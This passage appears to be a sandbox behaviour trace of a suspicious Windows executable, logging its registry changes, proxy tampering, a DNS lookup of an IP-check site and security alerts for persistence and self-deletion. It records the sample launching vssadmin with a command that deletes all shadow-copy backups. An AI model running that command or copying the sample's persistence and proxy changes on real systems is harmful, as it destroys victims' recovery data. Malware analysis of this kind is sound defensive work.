- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e319f02e-31a9-11e1-9a3f-806d6172696f}\"BaseClass" = Drive
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 57909
- mode: setval
- sequenceNumber: 561
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e319f02c-31a9-11e1-9a3f-806d6172696f}\"BaseClass"\"C:\WINDOWS\system32\vssadmin.exe" = Command Line Interface for Microsoft. Volume Shadow Copy Service
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 61781
- mode: failed
- sequenceNumber: 601
- value: C:\Documents and Settings\admin\Application Data\RASAPI32.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 61789
- mode: failed
- sequenceNumber: 602
- value: C:\Documents and Settings\admin\Application Data\rasman.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 61852
- mode: failed
- sequenceNumber: 603
- value: C:\Documents and Settings\admin\Application Data\TAPI32.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 61967
- mode: failed
- sequenceNumber: 604
- value: C:\Documents and Settings\admin\Application Data\rtutils.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 62017
- repeat: 30
- sequenceNumber: 605
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- apicall:
- timestamp: 62022
- sequenceNumber: 606
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetComputerNameW
- address: 0x76e96391
- params:
- param (id:1): 0x224fe50
- param (id:2): 0x224fe48
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 607
- timestamp: 62073
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 62301
- sequenceNumber: 608
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x76ee27c6
- params:
- param (id:1): 0x1cdda04
- param (id:2): 261
- apicall:
- timestamp: 62340
- sequenceNumber: 609
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetComputerNameW
- address: 0x769c6a9e
- params:
- param (id:1): 0x181e60
- param (id:2): 0x1cdd474
- file:
- timestamp: 62363
- mode: failed
- sequenceNumber: 610
- value: C:\Documents and Settings\admin\Application Data\msapsspc.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 62369
- mode: failed
- sequenceNumber: 611
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\msapsspc.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 62374
- mode: failed
- sequenceNumber: 612
- value: C:\Documents and Settings\admin\Application Data\schannel.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- regkey:
- timestamp: 62378
- mode: added
- sequenceNumber: 613
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 62383
- mode: failed
- sequenceNumber: 614
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\schannel.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 62388
- mode: failed
- sequenceNumber: 615
- value: C:\Documents and Settings\admin\Application Data\digest.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 616
- timestamp: 62392
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 62396
- mode: added
- sequenceNumber: 617
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 62401
- mode: failed
- sequenceNumber: 618
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\digest.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 62408
- mode: failed
- sequenceNumber: 619
- value: C:\Documents and Settings\admin\Application Data\msnsspc.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 62412
- mode: failed
- sequenceNumber: 620
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\msnsspc.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 62488
- mode: failed
- sequenceNumber: 621
- value: C:\Documents and Settings\admin\Application Data\iphlpapi.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- regkey:
- timestamp: 62492
- mode: added
- sequenceNumber: 622
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 62496
- mode: setval
- sequenceNumber: 623
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"AppData" = C:\Documents and Settings\admin\Application Data
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 62502
- mode: failed
- sequenceNumber: 624
- value: C:\Documents and Settings\admin\Application Data\Microsoft\NETWORK\CONNECTIONS\PBK
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x21
- file:
- timestamp: 62524
- mode: failed
- sequenceNumber: 625
- value: C:\Documents and Settings\admin\Application Data\sensapi.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- regkey:
- timestamp: 62767
- mode: added
- sequenceNumber: 626
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 62772
- mode: added
- sequenceNumber: 627
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 62776
- mode: added
- sequenceNumber: 628
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 62781
- mode: setval
- sequenceNumber: 629
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 62781
- mode: setval
- sequenceNumber: 630
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyServer" = 10.0.0.2:8080
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 62781
- mode: deleteval
- sequenceNumber: 631
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyOverride"
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 62831
- mode: deleteval
- sequenceNumber: 632
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"AutoConfigURL"
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 62835
- mode: added
- sequenceNumber: 633
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 62840
- mode: added
- sequenceNumber: 634
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 62843
- mode: setval
- sequenceNumber: 635
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 1d 00 00 00 01 00 00 00 0d 00 00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 c0 7e dd d3 73 dc cc 01 01 00 00 00 0a 00 02 0f 00 00 00 00 00 00 00 00 00 00 00 00
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 62853
- mode: started
- sequenceNumber: 636
- value: C:\WINDOWS\system32\vssadmin.exe
- pid: 1412
- ppid: 1056
- parentname: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- cmdline: "C:\WINDOWS\system32\vssadmin.exe" delete shadows /all /Quiet
- filesize: 33792
- md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
- sha1sum: 3eb0e4bf445a5adc70394a4ba6fd5631c64396ca
- ads:
- fid (ads:): 281474976713206
- apicall:
- timestamp: 62959
- sequenceNumber: 637
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x755dd323
- params:
- param (id:1): 0xeffc7c
- param (id:2): 261
- apicall:
- timestamp: 62960
- sequenceNumber: 638
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x755dd323
- params:
- param (id:1): 0xeffc7c
- param (id:2): 261
- regkey:
- timestamp: 62973
- mode: added
- sequenceNumber: 639
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network\Location Awareness
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 62981
- mode: failed
- sequenceNumber: 640
- value: C:\Documents and Settings\admin\Application Data\rasadhlp.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- process:
- timestamp: 63043
- mode: opened
- sequenceNumber: 641
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1412
- imagepath: C:\WINDOWS\system32\vssadmin.exe
- md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63082
- mode: added
- sequenceNumber: 642
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63086
- mode: added
- sequenceNumber: 643
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63089
- mode: setval
- sequenceNumber: 644
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyEnable" = 0x00000000
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63094
- mode: setval
- sequenceNumber: 645
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyServer" = 10.0.0.2:8080
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63099
- mode: deleteval
- sequenceNumber: 646
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyOverride"
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63103
- mode: deleteval
- sequenceNumber: 647
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\"AutoConfigURL"
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63108
- mode: added
- sequenceNumber: 648
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63113
- mode: added
- sequenceNumber: 649
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63117
- mode: setval
- sequenceNumber: 650
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\"SavedLegacySettings" = 46 00 00 00 1e 00 00 00 01 00 00 00 0d 00 00 00 31 30 2e 30 2e 30 2e 32 3a 38 30 38 30 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 c0 7e dd d3 73 dc cc 01 01 00 00 00 0a 00 02 0f 00 00 00 00 00 00 00 00 00 00 00 00
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 63137
- sequenceNumber: 651
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemTime
- address: 0x63004857
- params:
- param (id:1): 0x1cddabc
- apicall:
- timestamp: 63141
- sequenceNumber: 652
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: SystemTimeToFileTime
- address: 0x63004862
- params:
- param (id:1): 0x1cddabc
- param (id:2): 0x1cddaf0
- apicall:
- timestamp: 63194
- sequenceNumber: 653
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemTime
- address: 0x63004857
- params:
- param (id:1): 0x1cdd984
- apicall:
- timestamp: 63198
- sequenceNumber: 654
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: SystemTimeToFileTime
- address: 0x63004862
- params:
- param (id:1): 0x1cdd984
- param (id:2): 0x1cdd9ac
- file:
- timestamp: 63205
- mode: failed
- sequenceNumber: 655
- value: C:\Documents and Settings\admin\Application Data\DNSAPI.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- regkey:
- timestamp: 63209
- mode: added
- sequenceNumber: 656
- value: \REGISTRY\MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63212
- mode: added
- sequenceNumber: 657
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63262
- mode: added
- sequenceNumber: 658
- value: \REGISTRY\MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63265
- mode: added
- sequenceNumber: 659
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 63271
- mode: opened
- sequenceNumber: 660
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1412
- imagepath: C:\WINDOWS\system32\vssadmin.exe
- md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
- source:
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63276
- mode: added
- sequenceNumber: 661
- value: \REGISTRY\MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63280
- mode: added
- sequenceNumber: 662
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63285
- mode: added
- sequenceNumber: 663
- value: \REGISTRY\MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 63286
- mode: added
- sequenceNumber: 664
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 63286
- sequenceNumber: 665
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryA
- address: 0x76f28a9e
- params:
- param (id:1): 0x1cdbb7c
- param (id:2): 260
- mutex:
- timestamp: 63337
- sequenceNumber: 666
- value: \BaseNamedObjects\SHIMLIB_LOG_MUTEX
- processinfo:
- pid: 1412
- imagepath: C:\WINDOWS\system32\vssadmin.exe
- md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
- file:
- timestamp: 63342
- mode: failed
- sequenceNumber: 667
- value: C:\Documents and Settings\admin\Application Data\hnetcfg.dll
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- network:
- timestamp: 63518
- mode: dns_query
- sequenceNumber: 668
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- qtype: Host Address
- hostname: myexternalip.com
- malicious-alert:
- classtype: Network-Activity
- weight: 0
- ruleid: 5604 : Network outbound communication attempted ; Process attempting connections via dns_query
- msg: Process attempting connections via dns_query
- display-msg: Network outbound communication attempted
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10098 : Persistance with Self Delete Activity ; Persistance with Self Delete Activity
- msg: Persistance with Self Delete Activity
- display-msg: Persistance with Self Delete Activity
- network:
- timestamp: 63651
- mode: dns_query_answer
- sequenceNumber: 669
- processinfo:
- tainted: true
- pid: 1056
- imagepath: c:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: udp
- dns_response_code: 0
- hostname: myexternalip.com
- answer_number: 1
- ipaddress: 199.16.199.2
- regkey:
- timestamp: 63656
- mode: added
- sequenceNumber: 670
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio
- processinfo:
- pid: 1412
- imagepath: C:\WINDOWS\system32\vssadmin.exe
- md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
- regkey:
- timestamp: 63660
- mode: added
- sequenceNumber: 671
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\
- processinfo:
- pid: 1412
- imagepath: C:\WINDOWS\system32\vssadmin.exe
- md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
- regkey:
- timestamp: 63664
- mode: added
- sequenceNumber: 672
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\MSACM
- processinfo:
- pid: 1412
- imagepath: C:\WINDOWS\system32\vssadmin.exe
- md5sum: cdf76989d9fe20b7cc79c9c3f7ba2d4c
- regkey:
- timestamp: 63667
- mode: added
- sequenceNumber: 673
- value: \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Compression Manager\
- processinfo:
- pid: 1412
